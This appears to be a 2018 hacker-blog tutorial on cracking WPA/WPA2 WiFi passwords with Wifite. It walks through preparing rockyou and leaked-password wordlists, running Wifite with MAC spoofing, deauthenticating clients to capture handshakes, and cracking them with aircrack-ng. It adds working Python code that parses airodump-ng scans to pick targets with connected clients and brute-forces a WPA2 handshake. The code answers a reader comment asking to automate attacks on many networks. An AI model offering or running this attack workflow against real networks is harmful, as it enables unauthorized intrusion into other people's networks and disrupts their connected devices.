By r0gu3Sec | April 26, 2018 - 04:30 | Posted in CyberGuerrilla | 1 Comment

Someone asked me recently if I was familiar with the Caffe-Latte attack (a WEP client-side attack) using Wifite.

I found the question a little amusing, as I love the names these tools get:

ChopChop (Chinese dish), coWPAtty (Big B00bs) 😛

So I scraped around online, combined some tutorials and updated some links,

so you can dive into Wifite until you choke 😀

"Need to get laid more.. Yes, I know.. Thank you for noticing"

Crack WPA/WPA2 with Wifite

Btw, the Wifite link is to the wifite2 source code (yes, the new one.. yes, I got busted 😉).

Wifite2 is designed specifically for the latest version of Kali’s rolling release (tested on Kali 2017.2, updated Jan 2018).

Other pen-testing distributions (such as BackBox) have outdated versions of the tools used by Wifite; these distributions are not supported.

It is not my intention to write a top-10 software list; breaking down complexity in the hope that it becomes art for others is where the beauty lies 😉

Intro: Wifite is a Linux-based WiFi cracking tool (it comes pre-installed on Kali) written in Python. It automates the attack process and aims to minimize user input: it scans, picks targets, captures and cracks with as few prompts as possible.

Wifite can attack WEP, WPA/WPA2 and WPS, but not on its own. It drives existing WiFi cracking tools such as aircrack-ng, reaver, tshark and cowpatty for tasks like

  • Enabling monitor mode
  • Scanning the air
  • Capturing the handshake
  • Validating the handshake
  • Cracking the key
  • Analyzing output and captured packets, etc.

Guide for installing Wifite's required programs on BackTrack 5 R1, Ubuntu 11/10, and Debian 6.

Please note that this does not work against WPA Enterprise (802.1X/EAP), where there is no pre-shared key to crack. For that you would have to set up an Evil Twin with your own RADIUS server to receive the client's "Enterprise" authentication attempt, and then crack what you captured (typically an MSCHAPv2 challenge/response) offline.

Let’s get started…

Step 1 Get Your Dictionary File Ready

 

First, we need a dictionary to perform the dictionary attack. If the network you're attacking has WPS enabled, you may try to get the password that way first, and Wifite will do so by default.

Kali Linux provides some password dictionaries as part of its standard installation; you can find one at /usr/share/wordlists/rockyou.txt.gz

To get it ready for the attack, we need to type:

gzip -d /usr/share/wordlists/rockyou.txt.gz

BackTrack keeps them in /pentest/passwords/wordlists. It has one called darkc0de.lst alongside the rockyou.txt one.

You can use them simply by copying one of these paths after the '-dict' option.

/pentest/passwords/wordlists/rockyou.txt
/pentest/passwords/wordlists/darkc0de.lst

For any other distros, search for “download wordlist rockyou” or “download wordlist darkc0de”, or just “download wordlist” in DuckDuckGo. It gives more precise results than Google for this kind of stuff.

 

Get more dictionaries:

The passwords in this file include entries with fewer than 8 characters, which can never be a WPA/WPA2 passphrase (the standard requires 8 to 63 characters), so if you want to use it for WPA2 it is better to build a dictionary that only contains passwords of at least 8 characters. That turns it into a WPA dictionary. To do that, type this command:

cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > wpa.txt

pw-inspector ships with THC-Hydra; -m and -M are the minimum and maximum length to keep. (sort -u does the same job as sort | uniq, and note that sorting throws away rockyou's most-common-first ordering.)

wpa.txt contains 9606665 passwords, a huge list.
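The pw-inspector pipeline above filters on length only. What follows is an added example, my own Python rather than pw-inspector or Wifite code, that does the same filtering and adds the two checks a practitioner usually wants: lengths counted in bytes (which is what the hash input really is), and an optional ASCII-only filter, since 802.11i defines a passphrase as 8 to 63 characters in the printable range 32..126. It also deduplicates without sorting, so the frequency ordering of rockyou.txt (most common first) survives. The sample lines are constructed.

```python
"""Filter a raw wordlist down to syntactically valid WPA/WPA2 passphrases.

Added example for this page (not pw-inspector or Wifite code). Equivalent
to `sort | uniq | pw-inspector -m 8 -M 63`, except that it keeps the
original order and can also drop non-ASCII entries.
"""
from typing import Iterable, Iterator, Tuple

MIN_LEN, MAX_LEN = 8, 63   # IEEE 802.11i passphrase length limits


def is_wpa_passphrase(candidate: bytes, ascii_only: bool = True) -> bool:
    """Check the length in bytes and, optionally, that every byte is
    printable ASCII (0x20..0x7E) as the standard requires. A UTF-8 line
    such as 'español123' is 11 bytes but contains 0xC3 0xB1."""
    if not MIN_LEN <= len(candidate) <= MAX_LEN:
        return False
    return not ascii_only or all(0x20 <= b <= 0x7E for b in candidate)


def wpa_candidates(lines: Iterable[bytes], ascii_only: bool = True) -> Iterator[bytes]:
    """Yield unique valid passphrases in wordlist order.
    rockyou.txt is ordered by frequency; `sort | uniq` discards that
    ordering, which costs time when the real passphrase is a common one."""
    seen = set()                      # memory grows with the kept words
    for raw in lines:
        word = raw.rstrip(b"\r\n")
        if word in seen or not is_wpa_passphrase(word, ascii_only):
            continue
        seen.add(word)
        yield word


def filter_wordlist(src_path: str, dst_path: str, ascii_only: bool = True) -> Tuple[int, int]:
    """Stream src_path into dst_path; return (lines_read, lines_kept)."""
    read = kept = 0
    with open(src_path, "rb") as src, open(dst_path, "wb") as dst:
        def counted():
            nonlocal read
            for line in src:
                read += 1
                yield line
        for word in wpa_candidates(counted(), ascii_only):
            dst.write(word + b"\n")
            kept += 1
    return read, kept


# Constructed sample lines of the kinds found in rockyou.txt.
SAMPLE_LINES = [
    b"123456\n",               # 6 bytes: too short to be a PSK passphrase
    b"argentina\n",            # valid
    b"argentina\n",            # duplicate
    b"password1\n",            # valid
    b"espa\xc3\xb1ol123\n",    # UTF-8 'ñ': 11 bytes but not printable ASCII
    b"a" * 64 + b"\n",         # one byte over the 63 limit
    b"\n",                     # empty line
]

if __name__ == "__main__":
    for word in wpa_candidates(SAMPLE_LINES):
        print(word.decode())
```

Run it over the real file with `filter_wordlist("rockyou.txt", "wpa.txt")`; pass `ascii_only=False` if you would rather keep accented entries, which some vendor firmware accepts even though the standard does not.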

Now you have a lovely dictionary containing the most-used passwords in the world.
To download new dictionaries and make your list even bigger, check these two websites with updated dictionaries:

http://hashes.org/crackers.php
On Hashes you can find more than 25 dictionaries, with a daily updated list.

https://wiki.skullsecurity.org/Passwords
This is one of the best websites I have found for password dictionaries, with a huge collection. To download any of them go to the website; there you will find many dictionaries to download.

Dictionaries that come with some penetration-testing tools:
john.txt.bz2 twitter-banned.txt.bz2 conficker.txt.bz2
500-worst-passwords.txt.bz2 cain.txt.bz2

Leaked password dictionaries (these were leaked or stolen from sites):
phpbb.txt.bz2 elitehacker.txt.bz2 p0rn-unknown.txt.bz2
myspace.txt.bz2 hak5.txt.bz2 tuscl.txt.bz2
hotmail.txt.bz2 alypaa.txt.bz2 facebook-phished.txt.bz2
faithwriters.txt.bz2 facebook-pastebay.txt.bz2 carders.cc.txt.bz2

Again, to download any of those go to: https://wiki.skullsecurity.org/Passwords

Step 2 Launch Wifite

To launch Wifite you must be running with root permissions.

In a live Kali boot of that era you are logged in as root by default. If you leave it running for a while (cracking with the dictionary, presumably) and it asks for a password to return to the session, it's 'toor' (root backwards).

The same goes for BackTrack (confirmation needed). On other distros you can gain root by typing "su" or "sudo su" and entering a password: the first command requires root's password, the second your own account's password, and your account must be allowed to use sudo.

TL;DR? Okay, you just want the command? Here it is!

wifite -mac -aircrack -dict /usr/share/wordlists/rockyou.txt

-mac | Anonymizes your MAC address by randomizing it (the interface must not already be in monitor mode, or this won't work).

-aircrack | In the original wifite this selects aircrack-ng for verifying the captured handshake (it is on by default, alongside tshark); it does not limit which attacks run.

-dict | Selects the dictionary to use for cracking the password after capturing the handshake; without it you only get the '.cap' file and Wifite terminates.

These single-dash options are the original wifite's syntax. wifite2 uses double-dash options (for example --dict for the wordlist and --random-mac to randomize your MAC), so run wifite --help on your version before copying this line.

 

I have it located in a different folder because I’m not running Kali, but it’s pretty much the same.

Step 3 Select Your Wireless Adapter and Your Target

If you have a laptop with an external USB adapter, you will probably have to choose which adapter to use. Please note that you need a compatible adapter whose driver supports monitor mode and packet injection, or this won't work. (Monitor mode is not the same as promiscuous mode: promiscuous mode only sees traffic on a network you are already associated with, while monitor mode captures raw 802.11 frames from every network on the channel without associating.)

If prompted, we select our adapter by choosing the number Wifite has assigned it. In my case I'll type '1', because that's mine. One good indicator for knowing which one it is, is reading the name to the left of phy. For example, I have one that says 'usb' in it and one that doesn't, and yes, mine is plugged into USB, so that's the one.

Now we'll see a list of wireless networks, and if we let it run it will eventually display 'client' or 'clients' at the top right of the network info, showing that it has one or more clients connected.

To stop the scan, press Ctrl+C. I'll choose "Casa" (Spanish for house).

 

Step 4 Sit and Wait

If the network you're attacking has WPS enabled, it will start with a WPS attack first. To stop it, just press Ctrl+C.

Now it will attempt to capture the handshake for a few minutes.

If no clients are connected, it sends a broadcast deauthentication in the access point's name, so that any client that is actually there reconnects and shows up.

If it detects a client connected to the network, it will tell you the client's MAC address and send targeted deauths to that client.

When it succeeds in deauthenticating a client (which reconnects automatically by default), or a new client joins the network, it will hopefully capture the 4-way handshake, and it will start trying to crack it with aircrack-ng and the dictionary file you gave it.

If the passphrase is one of the words in that dictionary, it will stop and show it on screen. Otherwise it will run through the whole dictionary and report that it couldn't find the key. The outcome depends entirely on the passphrase being in the list, but with a good list the success rate against home networks is decent.

 

I used my country in lowercase letters as the passphrase (argentina), and as it's among the first words in this dictionary, it took only one second to crack. For you it may take an hour or two, depending on your processing power and on whether the passphrase is near the beginning or the end of the list.
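To see what Wifite is doing when it reports 'clients' and decides which network to deauth (and, incidentally, what the automation asked for in the comment at the end of this post boils down to), here is an added example. It is not Wifite's own code: it parses the CSV that airodump-ng writes with --output-format csv, keeps WPA/WPA2 networks that have an associated client, and skips any BSSID for which a capture already sits in hs/. The CSV below is constructed in airodump-ng's column layout, and the capture naming (ESSID_BSSID-with-dashes.cap) is an assumption about how Wifite names its files, so adjust has_saved_handshake if yours differ.

```python
"""Pick WPA targets with an associated client and no saved handshake.

Added example for this page (not Wifite's own code): parses the CSV that
`airodump-ng --output-format csv` writes and applies the selection rule
from Steps 3 and 4. Capture-file naming is an assumption (see below).
"""
import csv
import io
import re
from dataclasses import dataclass, field
from typing import Dict, Iterable, List


@dataclass
class Network:
    bssid: str
    essid: str
    channel: int
    privacy: str                      # OPN, WEP, WPA, WPA2 ...
    clients: List[str] = field(default_factory=list)


def parse_airodump_csv(text: str) -> Dict[str, Network]:
    """airodump-ng CSV = AP table, blank line, station table. Stations whose
    BSSID column is '(not associated)' are only probing, not connected."""
    aps: Dict[str, Network] = {}
    section = None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or not row[0].strip():
            continue
        head = row[0].strip()
        if head == "BSSID":
            section = "ap"
        elif head == "Station MAC":
            section = "sta"
        elif section == "ap":
            # columns: BSSID, first seen, last seen, channel, speed, privacy,
            # cipher, auth, power, #beacons, #IV, LAN IP, ID-length, ESSID, key
            aps[head.upper()] = Network(head.upper(), row[13].strip(),
                                        int(row[3].strip()), row[5].strip())
        elif section == "sta":
            # columns: station MAC, first seen, last seen, power, #packets,
            # BSSID, probed ESSIDs
            ap = row[5].strip().upper()
            if ap in aps:
                aps[ap].clients.append(head.upper())
    return aps


def capture_name(net: Network, hs_dir: str = "hs") -> str:
    """Assumed Wifite-style name: hs/<ESSID>_<BSSID with dashes>.cap."""
    safe = re.sub(r"[^A-Za-z0-9._-]", "-", net.essid) or "hidden"
    return f"{hs_dir}/{safe}_{net.bssid.replace(':', '-')}.cap"


def has_saved_handshake(net: Network, saved_files: Iterable[str]) -> bool:
    """Match on the BSSID (ESSIDs are not unique), accepting ':' or '-'."""
    pattern = re.compile("[:-]".join(re.escape(o) for o in net.bssid.split(":")), re.I)
    return any(pattern.search(name) for name in saved_files)


def pick_targets(aps: Dict[str, Network], saved_files: Iterable[str]) -> List[Network]:
    """WPA/WPA2 networks with at least one client and no handshake yet,
    busiest first: more clients means more chances of catching a reconnect."""
    saved = list(saved_files)
    chosen = [n for n in aps.values()
              if n.privacy.startswith("WPA") and n.clients
              and not has_saved_handshake(n, saved)]
    return sorted(chosen, key=lambda n: len(n.clients), reverse=True)


# Constructed scan output in airodump-ng's CSV layout (not a real capture).
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2018-04-26 04:30:01, 2018-04-26 04:35:10,  6,  54, WPA2, CCMP, PSK, -41,      120,        0,   0.  0.  0.  0,   4, Casa, 
AA:BB:CC:DD:EE:02, 2018-04-26 04:30:02, 2018-04-26 04:35:11, 11,  54, WPA2, CCMP, PSK, -67,       80,        0,   0.  0.  0.  0,   6, Vecino, 
AA:BB:CC:DD:EE:03, 2018-04-26 04:30:03, 2018-04-26 04:35:12,  1,  54, OPN,  ,  , -70,       50,        0,   0.  0.  0.  0,   5, Libre, 
AA:BB:CC:DD:EE:04, 2018-04-26 04:30:04, 2018-04-26 04:35:13,  3,  54, WPA2, CCMP, PSK, -52,       90,        0,   0.  0.  0.  0,   7, Oficina, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:01, 2018-04-26 04:31:00, 2018-04-26 04:35:09, -50,       30, AA:BB:CC:DD:EE:01, Casa
11:22:33:44:55:02, 2018-04-26 04:31:05, 2018-04-26 04:35:09, -55,       12, AA:BB:CC:DD:EE:01, 
11:22:33:44:55:03, 2018-04-26 04:32:00, 2018-04-26 04:35:00, -60,        3, (not associated), Vecino
11:22:33:44:55:04, 2018-04-26 04:32:00, 2018-04-26 04:35:00, -58,       40, AA:BB:CC:DD:EE:03, Libre
11:22:33:44:55:05, 2018-04-26 04:33:00, 2018-04-26 04:35:00, -59,       25, AA:BB:CC:DD:EE:04, Oficina
"""

if __name__ == "__main__":
    networks = parse_airodump_csv(SAMPLE_CSV)
    for net in pick_targets(networks, ["hs/Oficina_AA-BB-CC-DD-EE-04.cap"]):
        print(f"ch {net.channel:2d}  {net.bssid}  {net.essid:10s} "
              f"{len(net.clients)} client(s) -> save as {capture_name(net)}")
```

On the sample, "Vecino" is skipped because its only station is merely probing, "Libre" because it is open, and "Oficina" because a capture for its BSSID already exists, leaving "Casa" with two clients. Feed the function the CSV airodump-ng keeps rewriting (`-w scan` produces scan-01.csv) and the file list from `os.listdir("hs")`, and you have the loop the comment asks for: targeted deauths go to the listed client MACs with aireplay-ng, and the capture is saved under capture_name.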

 

Wifite Succeeded but Failed!

 

If it failed, you still get the '.cap' file (hopefully not empty).

You can use that file with the same dictionary (or others) with aircrack-ng, using this command:

aircrack-ng -w <location of dictionary> <location of your .cap file>

If the capture contains more than one network, add -b <BSSID> (or -e <ESSID>) so aircrack-ng does not stop to ask which one to crack.

In Kali live, '.cap' files get saved into a folder named 'hs' inside the directory you launched Wifite from.

After Wifite has ended, type:

ls ./hs

to see your '.cap' files and the other files used for cracking.
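What aircrack-ng actually does with the .cap and the wordlist is worth seeing once, because it explains both why cracking is slow and why a passphrase that is not in the list is unreachable. The following is an added example written for this page, not aircrack-ng's code: a reference WPA2-PSK check that derives the PMK from passphrase and SSID, expands it to the PTK using the AP and client MACs and the two nonces, and tests whether the resulting KCK reproduces the MIC of EAPOL message 2. It has no pcap parser; the handshake is synthesised in memory with the same primitives (arbitrary MACs and nonces), so it demonstrates the derivation rather than reading your hs/*.cap. For that, keep using aircrack-ng.

```python
"""What "cracking the handshake" means: a reference WPA2-PSK check.

Added example for this page, not aircrack-ng's code. Same computation
aircrack-ng does per dictionary word: PMK from passphrase+SSID (PBKDF2-
HMAC-SHA1, 4096 rounds), PTK from PMK + both MACs + both nonces, then
check that the KCK reproduces the MIC of EAPOL message 2. No pcap parser:
the sample handshake is built in memory with the same primitives.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional

MIC_OFFSET = 81   # 802.1X header (4) + EAPOL-Key fields preceding the MIC


@dataclass(frozen=True)
class Handshake:
    ssid: bytes
    ap_mac: bytes     # 6 bytes (Authenticator address)
    sta_mac: bytes    # 6 bytes (Supplicant address)
    anonce: bytes     # 32 bytes, from message 1
    snonce: bytes     # 32 bytes, from message 2
    eapol: bytes      # complete EAPOL-Key frame of message 2
    mic: bytes        # the 16-byte MIC carried in that frame


def derive_pmk(passphrase: bytes, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32 bytes): the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
               anonce: bytes, snonce: bytes, length: int = 48) -> bytes:
    """802.11i PRF-384 for CCMP: PTK = KCK(16) | KEK(16) | TK(16)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out, i = b"", 0
    while len(out) < length:
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
        i += 1
    return out[:length]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 over the frame with the
    MIC zeroed, truncated to 16 bytes. Version 1 (TKIP) uses HMAC-MD5 instead."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def check_passphrase(hs: Handshake, passphrase: bytes) -> bool:
    pmk = derive_pmk(passphrase, hs.ssid)
    kck = derive_ptk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, hs.eapol), hs.mic)


def crack_handshake(hs: Handshake, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """First word that reproduces the MIC, or None. Words outside 8..63 bytes
    are skipped before the PBKDF2 step: they cannot be WPA passphrases."""
    for word in wordlist:
        word = word.rstrip(b"\r\n")
        if 8 <= len(word) <= 63 and check_passphrase(hs, word):
            return word
    return None


def build_message2(snonce: bytes, replay_counter: int = 1) -> bytes:
    """Minimal RSN EAPOL-Key message 2 with the MIC field zeroed."""
    body = (b"\x02"                          # descriptor type: RSN
            + b"\x01\x0a"                    # key info: MIC, pairwise, version 2
            + b"\x00\x00"                    # key length
            + replay_counter.to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # IV, RSC, ID
            + b"\x00" * 16                   # MIC, filled in by the supplicant
            + b"\x00\x00")                   # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v1, EAPOL-Key


def make_sample_handshake(passphrase: bytes, ssid: bytes = b"Casa") -> Handshake:
    """Constructed handshake (no real capture on this page): MACs and nonces
    are arbitrary, the MIC is computed from the given passphrase."""
    ap_mac, sta_mac = bytes.fromhex("aabbccddee01"), bytes.fromhex("112233445501")
    anonce, snonce = hashlib.sha256(b"anonce").digest(), hashlib.sha256(b"snonce").digest()
    frame = build_message2(snonce)
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame)
    frame = frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, frame, mic)


if __name__ == "__main__":
    hs = make_sample_handshake(b"argentina")
    print(crack_handshake(hs, [b"123456\n", b"password\n", b"argentina\n"]))
```

The cost is all in derive_pmk: 4096 HMAC-SHA1 rounds per candidate, salted with the SSID, so the work cannot be shared between networks with different names. That is why a 9.6-million-word list takes hours on a CPU, why precomputed tables (cowpatty's genpmk) only exist for the most common SSIDs, and why the result is binary: the passphrase is in the list or it is not.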

 

Some More Words

Well, that's pretty much it. I hope you find it helpful, but remember to read OTW's guides on wireless cracking to know exactly what this script is doing, so you can tweak it further or play with its options for more effectiveness (type 'wifite --help' to see its options).


One Response to Crack WPA/WPA2 with Wifite

  1. Dear author: Is there any option or script that does the following automatically?

    1. Scan
    2. Automatically pick a network with one or more connected clients for which no handshake has been saved yet
    3. Try to deauthenticate the client(s)
    4. Try to capture the handshake and save it with the network name in the file name
    5. Go back to step 1 until I press Ctrl-C

    That way I wouldn't have to wait all day for clients to connect to each of the networks I'm interested in attacking.

    Many thanks
    Best regards

    Marcelo
